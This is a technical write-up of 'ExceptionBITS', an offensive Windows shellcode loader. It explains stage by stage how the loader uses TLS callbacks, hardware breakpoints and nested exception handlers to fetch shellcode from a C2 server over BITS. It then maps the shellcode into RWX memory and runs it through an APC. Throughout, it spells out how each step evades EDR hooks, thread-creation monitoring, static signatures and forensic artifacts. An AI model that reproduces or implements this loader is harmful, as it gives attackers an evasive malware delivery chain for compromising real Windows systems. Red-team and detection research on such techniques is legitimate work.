ExceptionBITS
A loader for demonstrating download and execution of shellcode using nested vectored exception handlers and BITS
ExeptionBits is a hardware-breakpoints based loader that sets up hardware breakpoints and the Vectored Exception Handler(VEH) even execution of the main thread using TLS callbacks. The idea is to put the checkpoints on obscure memory locations or external functions in a benign loking application. These so called breakpoint "checkpoints", when hit, can lead the program to enter a "EXCEPTION_SINGLE_STEP" mode where the magic happens.
In this mode, the VEH controls the execution flow of the program. The main VEH then downloads the shellcode from a C2/remote server using Windows Background Intelligent Transfer Service (BITS), stores the payload in mapped memory and finally executes in a Asynchronous Process Call (APC).
In order to circumvent user-mode hooks, ExceptionBITS uses something similar to syscalls tampering by rad9800 and Tampered Syscalls Via Hardware BreakPoints by Maldev-Academy. How syscalls tampering is implemented in this is as follows -
First the VEH calculates the SSN for the required Zw* "malicious" functions from ntdll.dll's export table and uses the sorted index as the SSN.
The VEH then calls a benign NTAPI such as NtQuerySecurityObject with some function arguments.
It then hooks onto that benign NTAPI by placing a hardware breakpoint at the start of the syscall stub.
The CRITICAL_SECTIONS are then synchronized to prevent race conditions.
In the nested VEH for the "malicious" functions, the SSN of the benign finction is replaced in the RAX register.
Finally the desired number of parameters are replaced and the function is executed.
This is repeated for all the "malicious" functions.
Overall Program Flowchart

Detailed Working Of ExceptionBITS
ExceptionBITS operates through four distinct stages:
TLS initialization β Main execution β Payload delivery β Syscall tampering.
We will go through all the stages one by one in the expandables below.
TLS Initialization
1.1 TLS Callback registration
#pragma comment (linker, "/INCLUDE:_tls_used")forces the linker to include the_tls_usedsymbol, which tells Windows that this executable contains TLS data and callbacks.The
#ifdef _WIN64block handles platform-specific symbol naming. On x86, symbols are prefixed with an underscore, so_HWBPTlsCallbackis used instead ofHWBPTlsCallback.#pragma const_seg(".CRT$XLB")places the next variable into a special PE section called.CRT$XLB. The.CRT$sections (ranging from.CRT$XLAto.CRT$XLZ) are reserved for C Runtime initialization.The callback pointer
HWBPTlsCallbackis assigned to point toHWBPTlsCallbackFunction, which will be called automatically by the Windows loader
The .CRT$XLB section is important because Windows loader automatically processes sections named .CRT$XL* during process initialization before the main() entry point executes. The sections are processed alphabetically (XLA, XLB, XLC...), so placing the callback in XLB ensures it runs early but after essential system-critical initialization in XLA. This gives ExeceptionBITS a pre-execution window where security monitoring tools may not yet be fully active, as most EDR hooks are established during or after DLL loading which happens after TLS callbacks.
1.2 TLS Callback Function Implementation
dwReason == DLL_PROCESS_ATTACHchecks if this callback is being invoked during process initialization. TLS callbacks receive the same reason codes asDllMain(DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH).tls_thread_id = GetCurrentThreadId()stores the main thread's ID, which will be used later to verify context restoration is happening on the same thread.AddVectoredExceptionHandler(1, VectoredHandler)registers a Vectored Exception Handler (VEH) with priority 1. VEHs are called before structured exception handlers (SEH) when exceptions occur. The priority determines the order.CONTEXT ctx = { 0 }initializes a CONTEXT structure, which represents the CPU's register state for a thread.ctx.ContextFlags = CONTEXT_DEBUG_REGISTERSspecifies that we want to manipulate the debug registers (Dr0-Dr7).GetThreadContext(thread, &ctx)retrieves the current register state of the thread.ctx.Dr0 = (DWORD64)&DummyFunctionsets the Dr0 debug register to the memory address ofDummyFunction. Dr0-Dr3 are address registers that can hold breakpoint addresses.ctx.Dr7 = 0x00000001configures the Dr7 control register. The value0x00000001sets bit 0 (L0), which enables the breakpoint stored in Dr0 as a local (thread-specific) breakpoint.ctx.Dr6 = 0clears the Dr6 status register, which tracks which breakpoints have fired.SetThreadContext(thread, &ctx)applies the modified register state back to the thread, activating the hardware breakpoint.saved_context = ctxstores the entire context (including the breakpoint configuration) in a global variable for later restoration.
By setting only bit 0 (0x00000001), the loader creates an execution breakpoint on Dr0. When the CPU's instruction pointer reaches the address stored in Dr0, it generates a SINGLE_STEP exception instead of executing the instruction. This is harder for security tools to trace than traditional function calls.
The context is saved because Windows may clear debug registers when transitioning between kernel and user mode or during context switches. By saving it, the loader can restore the breakpoint if Windows clears it before main() executes.
Demo Target Function Call
__declspec(noinline)is a compiler directive that prevents the optimizer from inlining this function. Inlining would eliminate the function's distinct address, which would break the hardware breakpoint targeting.The function body is intentionally empty because it will never actually execute. This is for demo purposes but this function can be changed to any other external function or an obscure memory region.
typedef void (*pfunc_t)()defines a function pointer type that points to functions taking no arguments and returning void.static pfunc_t volatile pDummy = DummyFunctioncreates a static, volatile function pointer. Thevolatilekeyword prevents the compiler from optimizing away the indirection, ensuring the call goes through the pointer.
Using a function pointer instead of calling DummyFunction() can confuse static analysis tools. The volatile qualifier forces the compiler to generate actual memory access for the function pointer, preventing optimization that might make the call pattern obvious to signature-based detection.
Main Execution
2.1 Context Restoration
if (!context_saved)checks if the TLS callback successfully saved a context. If not, there's nothing to restore.The function logs the current thread ID and the TLS thread ID to verify they match, ensuring we're restoring the context on the correct thread.
GetCurrentThread()returns a pseudo-handle to the current thread. This is always-2and represents "the calling thread".SetThreadContext(thread, &saved_context)reapplies the entire saved context, including the Dr0, Dr6, and Dr7 registers, effectively reactivating the hardware breakpoint onDummyFunction
This restoration step is necessary because Windows may clear debug registers during thread context switches or when returning from kernel mode to user mode as a security measure. By restoring the context at the beginning of main(), ExceptionBITS ensures that the hardware breakpoint is active when pDummy() is called.
2.2 Main Function Flow
The function begins with verification that
veh_handleis valid, confirming the TLS callback executed successfully.RestoreSavedContext()reactivates the hardware breakpoint that may have been cleared by Windows.pDummy()calls the function pointer pointing toDummyFunction. This is where execution hits the hardware breakpoint.When the breakpoint triggers, the CPU immediately generates a
SINGLE_STEPexception, and control transfers toVectoredHandlerwithout executing any code inDummyFunction.After
VectoredHandlercompletes and returnsEXCEPTION_CONTINUE_EXECUTION, execution resumes here at the instruction afterpDummy().GetTickCount()returns the number of milliseconds since system boot. This is used to implement a timeout mechanism.SleepEx(1000, TRUE)puts the thread to sleep for 1000ms (1 second), but with the second parameterTRUE, it enters an alertable wait state.In an alertable wait, the kernel can interrupt the sleep to deliver Asynchronous Procedure Calls (APCs) queued to this thread.
result == WAIT_IO_COMPLETIONindicates the sleep was interrupted by an APC.WAIT_IO_COMPLETION(value 0xC0) means an APC was delivered and executed.The loop continues until either an APC executes or 10 seconds (APC_TIMEOUT) elapse, providing a timeout mechanism.
RemoveVectoredExceptionHandler(veh_handle)unregisters the main VEH to clean up.HaltHardwareBreakpointHooking()removes the syscall tampering VEH and cleans up the critical section.
The pDummy() call triggers the entire payload delivery chain. The use of SleepEx with alertable wait is the correct way to allow APC execution in user mode. Regular Sleep() would not allow APCs to run. APCs are a kernel-level mechanism that allows one thread to queue a function to be executed by another thread, but they only execute when the target thread is in an alertable wait state (via functions like SleepEx, WaitForSingleObjectEx, etc.). The timeout mechanism prevents the program from hanging indefinitely if something goes wrong with the payload delivery.
Payload Delivery
3.1 Exception Filtering and Breakpoint Clearing
EXCEPTION_POINTERS* ExceptionInfois a structure containing two nested structures:ExceptionRecord(details about the exception) andContextRecord(CPU register state when the exception occurred).static BOOL main_processing = FALSEis a static variable (persistent across function calls) used as a reentry guard. Once set to TRUE, subsequent calls to this handler during the same execution will immediately return.ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEPchecks if the exception is the expected type.EXCEPTION_SINGLE_STEP(0x80000004) is generated by hardware breakpoints and the trap flag. If it's a different exception type, this handler isn't interested, so it returnsEXCEPTION_CONTINUE_SEARCHto let other handlers process it.if (shellcode_executed)andif (main_processing)are checks to prevent reentry. Once the main work is done (main_processing = TRUE) or shellcode is running (shellcode_executed = TRUE), this handler steps aside and lets the syscall tampering handler deal with any further exceptions.ExceptionInfo->ExceptionRecord->ExceptionAddresscontains the instruction pointer (RIP/EIP) where the exception occurred. Logging this confirms it matchesDummyFunction's address.ctx.Dr0 = 0; ctx.Dr6 = 0; ctx.Dr7 = 0clears all debug registers, disabling the hardware breakpoint onDummyFunction. This is critical because otherwise, returningEXCEPTION_CONTINUE_EXECUTIONwould cause the breakpoint to trigger again immediately, creating an infinite loop.
The reentry guards (main_processing and shellcode_executed) are essential because this is a global exception handler that will be called for EVERY SINGLE_STEP exception in the process. Once the main payload delivery logic runs, we don't want it to run again. The syscall tampering mechanism will generate many SINGLE_STEP exceptions (one for each tampered syscall), and those need to be handled by the dedicated syscall tampering VEH (registered with priority 0, so it runs first), not this handler. By returning EXCEPTION_CONTINUE_SEARCH when appropriate, this handler cooperates with the other VEH in a multi-handler architecture.
3.2 Hash Calculation and Syscall Infrastructure
CALC_HASH("ZwCreateSection")is a macro that expands toCRC32BA("ZwCreateSection"), which computes a 32-bit CRC32 hash of the function name string.The three hash calculations produce unique identifiers for the NT functions needed:
ZwCreateSection(creates a memory section object),ZwMapViewOfSection(maps the section into the process's address space), andZwQueueApcThread(queues an APC for execution).Global variables
g_ZwCreateSection_Hash,g_ZwMapViewOfSection_Hash, andg_ZwQueueApcThread_Hashstore these hashes for later use by theTAMPER_SYSCALLmacro.InitHardwareBreakpointHooking()is a function that registers a second VEH specifically for intercepting the tampered syscalls. This VEH has priority 0, meaning it will be called before the main VEH (priority 1).If initialization fails, the function resets the flags and returns
EXCEPTION_CONTINUE_EXECUTIONto allow the program to continue (though it won't function correctly).
3.3 BITS-Based Shellcode Download
IBackgroundCopyManager* pManager = NULLdeclares a pointer to the BITS manager interface. BITS (Background Intelligent Transfer Service) is a Windows component designed for reliable background file transfers.HRESULT hrstores return values from COM methods. COM usesHRESULTvalues where negative numbers (< 0) indicate failure, and non-negative numbers indicate success.CoInitializeEx(NULL, COINIT_MULTITHREADED)initializes the COM library for multi-threaded apartment model. This is required before using any COM interfaces.FAILED(hr)is a macro that checks ifhr < 0, indicating a COM error.GetTempPathA(MAX_PATH, tempPath)retrieves the path to the system's temporary directory (typicallyC:\Users\<username>\AppData\Local\Temp).strcat_s(tempPath, MAX_PATH, "shellcode.tmp")appends "shellcode.tmp" to the temp path, creating a full file path for the download destination.CoCreateInstance(&CLSID_BackgroundCopyManager, ...)creates an instance of the BITS Background Copy Manager COM object. TheCLSID_BackgroundCopyManageris the unique identifier{4991d34b-80a1-4291-83b6-3328366b9097}.pManager->lpVtbl->CreateJob(...)creates a new BITS job named "HWBP_Download" of typeBG_JOB_TYPE_DOWNLOAD(value 0). BITS jobs can be downloads, uploads, or upload-replies.
MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0)calculates the number of wide characters needed to represent the UTF-8 URL string. Calling it withNULLand0for the output parameters makes it return the required buffer size.malloc(urlLen * sizeof(WCHAR))allocates memory for the wide character string.WCHARis typically 2 bytes.The second
MultiByteToWideCharcall actually performs the conversion from multi-byte (UTF-8) to wide character (UTF-16), which BITS requires.pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath)adds a file transfer to the job, specifying the remote URL and local destination path.pJob->lpVtbl->Resume(pJob)starts the download. BITS jobs are created in a suspended state and must be explicitly resumed.The
do-whileloop polls the job state every 300ms.GetStatereturns values likeBG_JOB_STATE_QUEUED(0),BG_JOB_STATE_CONNECTING(1),BG_JOB_STATE_TRANSFERRING(2),BG_JOB_STATE_TRANSFERRED(4), orBG_JOB_STATE_ERROR(8).pJob->lpVtbl->Complete(pJob)finalizes the job, moving the temporary file to its final destination. BITS downloads to a temporary location first.CreateFileAopens the downloaded file withGENERIC_READaccess.GetFileSizeretrieves the file size. The validationfileSize > maxSizeprevents buffer overflows.ReadFilereads the entire file content into the provided buffer.The
cleanupsection usesgotofor error handling, ensuring COM objects are released, memory is freed, and the temporary file is deleted regardless of how the function exits
BITS is a legitimate Windows service used by Windows Update, Microsoft Store, and many enterprise applications, so BITS traffic is common and expected. Network monitoring won't flag it as suspicious. Second, BITS handles network interruptions gracefully; if the connection drops, BITS automatically resumes when connectivity returns, making the download highly reliable. Third, BITS respects network throttling policies and uses idle bandwidth, making it less likely to trigger network anomaly detection based on bandwidth usage patterns. Fourth, BITS jobs persist across reboots i.e if the system restarts during download, BITS resumes automatically. However, this also means forensic investigators could find evidence of the BITS job in Windows event logs and BITS database files, which is why the cleanup is thorough. The conversion to wide character strings is necessary because BITS's COM interface expects UTF-16 strings (Windows's internal Unicode format). The polling loop could be replaced with BITS's callback mechanism for efficiency, but polling is simpler and avoids registering additional COM callbacks that might leave forensic artifacts. The immediate deletion of the temporary file after reading it into memory minimizes the window during which the shellcode exists on disk. In a more sophisticated version, the downloaded file could be encrypted and decrypted in memory only, never touching disk in decrypted form.
3.4 Memory Allocation via Tampered Syscalls
PBYTE pPayloadis a pointer to the downloaded shellcode buffer,SIZE_T sPayloadSizeis its size in bytes, andPVOID* ppAddressis an output parameter that will receive the address of the allocated memory.LARGE_INTEGER MaximumSizeis a 64-bit integer structure used to specify sizes larger than 32 bits.QuadPartaccesses it as a single 64-bit value.The
TAMPER_SYSCALLmacro invokes the syscall tampering mechanism. The first parameter is the hash of the target function (ZwCreateSection), followed by that function's parameters.For
ZwCreateSection:&hSection(output handle),SECTION_ALL_ACCESS(0x1F, all access rights),NULL(no object attributes),&MaximumSize(section size),PAGE_EXECUTE_READWRITE(0x40, RWX memory protection),SEC_COMMIT(0x8000000, commit physical storage), then NULL padding for additional parameters.(HANDLE)-1is a pseudo-handle meaning "current process". It's the equivalent ofGetCurrentProcess()but as a constant.For
ZwMapViewOfSection:hSection(section handle),(HANDLE)-1(target process),&pAddress(output base address),NULL(zero bitsβno specific address requirements),NULL(commit size),NULL(section offset),&sViewSize(view size),ViewUnmap(2, inheritance disposition),NULL(allocation type),PAGE_EXECUTE_READWRITE(protection), then NULL padding.memcpy(pAddress, pPayload, sPayloadSize)copies the shellcode bytes from the temporary buffer to the newly allocated executable memory.hFileMapping = hSectionstores the section handle globally for later cleanup.*ppAddress = pAddresswrites the allocated address to the output parameter, so the caller knows where the shellcode is.
Section objects are kernel objects that represent shared memory regions. Unlike VirtualAlloc which directly allocates memory in a process, section objects are created in kernel space then mapped into user space. This is more flexible but also less commonly monitored by EDR. Many security products focus on VirtualAllocEx or NtAllocateVirtualMemory for detecting malicious memory allocation, but ZwCreateSection/ZwMapViewOfSection is an alternative path that's often under-monitored. Allocating with PAGE_EXECUTE_READWRITE immediately is a red flag in modern security analysis; most legitimate code allocates memory with PAGE_READWRITE, writes code to it, then changes protection to PAGE_EXECUTE_READ. However, since this loader is using syscall tampering, the actual Win32 API being monitored (VirtualAllocEx) is never called, so permission-based heuristics that watch API parameters are bypassed. The section object persists even if the handle is closed, as long as there's a mapped view, which is why CloseHandle can safely be called on error paths. The ViewUnmap parameter (value 2) specifies that child processes won't inherit this mapping, which is appropriate for shellcode injection.
3.5 APC Queueing
static char tempBuffer[MAX_SHELLCODE_SIZE]declares a 4096-byte buffer on the stack (actually in the DATA section due tostatic). Static local variables persist across function calls and are zero-initialized.DownloadShellcodeis called with the URL, buffer, and maximum size. It returns the number of bytes actually read.If download fails (
shellcode_size == 0), the function resets flags and returnsEXCEPTION_CONTINUE_EXECUTION, which resumes execution after thepDummy()call inmain().FileMapInjectTamperedallocates executable memory and copies the shellcode. On failure, same error handling applies.For
ZwQueueApcThread:GetCurrentThread()(target thread handle),(PVOID)shellcode_buffer(APC routine addressβthis is the shellcode entry point), then 10 NULL parameters (for APC arguments and system-specific use).shellcode_executed = TRUEandmain_processing = FALSEupdate global state flags.return EXCEPTION_CONTINUE_EXECUTIONtells Windows to resume execution. The CPU will return to the instruction afterpDummy()inmain()
The APC (Asynchronous Procedure Call) mechanism is a Windows kernel feature that allows one context to request that code be executed in another thread's context. APCs come in two types: user-mode and kernel-mode. This loader uses user-mode APCs, which only execute when the target thread enters an alertable wait state. The genius of this approach is that the shellcode runs in the context of the loader's own main thread, not a newly created thread. Thread creation is one of the most monitored events in process security; EDR and AV products track every CreateThread, CreateRemoteThread, and NtCreateThreadEx call. By using an APC on an existing thread, the loader avoids this telemetry completely. The shellcode appears to execute spontaneously during a SleepEx call, which looks like a normal thread waiting for I/O. The NULL parameters to ZwQueueApcThread are placeholders i.e the function signature allows passing arguments to the APC routine, but shellcode typically doesn't expect arguments (it's position-independent and self-contained). The fact that EXCEPTION_CONTINUE_EXECUTION returns execution to main() shows the exception was handled successfully, the breakpoint is cleared, and life continues normally. If this returned EXCEPTION_CONTINUE_SEARCH, Windows would look for other exception handlers, potentially triggering termination if no handler claims the exception.
Syscall Tampering
4.1 SSN Discovery Through Export Table Parsing
GetModuleHandleA("ntdll.dll")retrieves the base address of ntdll.dll, which is already loaded in every Windows process. This returns the HMODULE, which is actually the base address where the DLL is mapped.PIMAGE_DOS_HEADER pDosHeaderpoints to the DOS header, which starts with the signature "MZ" (0x5A4D). Every PE file begins with this legacy DOS header.pDosHeader->e_lfanewis an offset to the PE header (IMAGE_NT_HEADERS). In ntdll.dll, this is typically 0xF0.pImgNtHdrs->Signature != IMAGE_NT_SIGNATUREverifies the PE signature is "PE\0\0" (0x00004550).DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]accesses the export directory entry (index 0) in the data directory array. This contains the RVA and size of the export table.PIMAGE_EXPORT_DIRECTORYpoints to a structure containing three important arrays: AddressOfNames (RVAs of function name strings), AddressOfFunctions (RVAs of function code), and AddressOfNameOrdinals (indices mapping names to addresses).*(unsigned short*)pFunctionName == 'wZ'checks if the first two characters are 'Z' and 'w' by treating them as a 16-bit integer. In little-endian (which x86/x64 uses), this reads as 'w' in the low byte and 'Z' in the high byte, forming the value 0x775A ("wZ").HASH_STR(pFunctionName)computes the CRC32 hash of the function name.uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]calculates the absolute address of the function. The ordinal array provides an index into the address array, and adding the base address converts the RVA to a virtual address.The bubble sort orders functions by address. This is intentional because in Windows, the SSN of a function corresponds to its position when syscalls are sorted by address.
This PE parsing manually walks ntdll's export table to enumerate all syscalls. Windows ntdll.dll exports two parallel sets of syscall wrappers: Nt* and Zw* functions. Both ultimately invoke the same kernel-mode functions, but they have different behaviors in kernel mode (not relevant here). ExceptionBITS chooses Zw* functions, which may be less commonly hooked. Microsoft assigns SSNs sequentially based on alphabetical/address order. For example, in Windows 10 21H2 x64, if you sort all Zw functions by address, ZwAcceptConnectPort gets SSN 0, ZwAccessCheck gets SSN 1, and so on. This ordering is consistent within a Windows build but changes between versions (e.g., Windows 10 vs. Windows 11). By dynamically discovering this ordering at runtime, ExceptionBITS adapts to any Windows version without hardcoded SSNs. The limitation is that this technique only works for Zw* functions exported from ntdll; if a syscall isn't exported or is obfuscated, this won't find it. The bubble sort is inefficient (O(nΒ²)), but with only ~400-500 Zw functions in ntdll, it completes in milliseconds. The use of RVAs (Relative Virtual Addresses) in PE files is important as they're offsets from the base address, allowing the same DLL to load at different addresses due to ASLR without breaking references.
4.2 Fetching the System Service Number (SSN) by Hash
This function is the bridge between the hash-based identification of syscalls and their actual SSN, which is required for the kernel to execute the correct system call. By using hashes, the loader avoids storing or referencing sensitive function names directly, making static analysis and signature-based detection much harder. The dynamic resolution of SSNs means the loader is robust across Windows versions, as SSNs can change between builds.
4.3 Preparing the Tampered Syscall Hijack
This function is the heart of the tampering mechanism. By setting a hardware breakpoint on the syscall instruction of a benign function (the decoy), the loader ensures that when the decoy is called, execution will be intercepted just before the transition to kernel mode. This allows the loader to swap out the decoy's SSN and parameters for those of the real, sensitive syscall. The use of hardware breakpoints (rather than software breakpoints) makes this invisible to most user-mode monitoring tools and avoids modifying code in memory, which is a common detection vector.
4.4 Passing Parameters for the Tampered Syscall
The use of a critical section ensures that only one thread can modify the tampered syscall parameters at a time, preventing corruption or unexpected behavior. This is especially important in complex loaders that may operate in multi-threaded contexts or be injected into multi-threaded processes.
4.5 Installing the Hardware Breakpoint
By setting RW0 to 00 (execute) and LEN0 to 00 (1 byte), the loader ensures the breakpoint only triggers on instruction execution at the exact address. Setting L0 to 1 enables the breakpoint for the current thread only, making it invisible to other threads and harder to detect.
4.6 Exception Handler for Tampered Syscall Execution
The exception handler directly manipulates the CPU's register state, swapping out the decoy values for the real ones just before the syscall instruction executes. This means the kernel receives the real syscall and parameters, even though the user-mode code called a benign function. This bypasses user-mode hooks, IAT/EAT patching, and most EDR monitoring, as the actual syscall transition is never made through the monitored API.
Results And Screenshots
Execution On Target System




Callback To Remote Server

Last updated